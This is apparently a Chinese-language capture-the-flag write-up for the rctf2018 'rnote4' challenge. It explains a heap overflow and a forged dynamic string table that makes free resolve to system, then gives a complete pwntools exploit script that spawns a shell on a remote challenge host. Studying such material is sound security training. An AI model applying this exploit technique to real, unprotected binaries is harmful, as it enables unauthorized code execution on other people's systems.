rctf2018_rnote4
首先,检查一下程序的保护机制,无RELRO保护,无PIE保护
然后,我们用IDA分析一下,edit功能里可以自由控制长度,存在溢出
整个程序没有任何的输出
通过堆溢出,我们可以轻松构造任意地址写,但是没有输出函数,不能泄露地址,由此,想到了一个巧妙的方法,这个程序没有开启RELRO保护,那么其dt_strtab是可以修改的
那么,我们只要在这里,将strtab表指针改成我们伪造的字符串表,然后,将某函数的got修改为其对应的plt load地址,当接下来调用该函数时,就可以将该函数解析为我们在字符串表里指定函数名的函数地址,这原理就是ret2dl的原理。在这里,我们将free函数解析为system函数,然后拿shell
#coding:utf8
from pwn import *
#sh = process('./RNote4')
sh = remote('node3.buuoj.cn',28637)
elf = ELF('./RNote4')
free_got = elf.got['free']
free_got_ld = 0x0000000000400626
#在NO relro的情况下伪造dynstr即可解析任意函数
fake_dynstr_addr = 0x00000000006020D0 + 0x100
fake_dynstr = '\x00'*0x5F + 'system\x00'
fake_dynstr = fake_dynstr.ljust(0x73,'\x00')
fake_dynstr += 'GLIBC_2.4\x00GLIBC_2.2.5\x00'
dt_strtab = 0x0000000000601EB0
def add(size,content):
sh.send(p8(1))
sh.send(p8(size))
sh.send(content)
def edit(index,size,content):
sh.send(p8(2))
sh.send(p8(index))
sh.send(p8(size))
sh.send(content)
def delete(index):
sh.send(p8(3))
sh.send(p8(index))
add(0x20,'a'*0x20) #0
add(0x80,'b'*0x80) #1
add(0x20,'/bin/sh\x00'.ljust(0x20,'\x00')) #2
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(fake_dynstr_addr)
edit(0,0x40,payload)
#伪造dynstr
edit(1,len(fake_dynstr),fake_dynstr)
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(dt_strtab)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(fake_dynstr_addr))
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(free_got)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(free_got_ld))
#getshell
delete(2)
sh.interactive()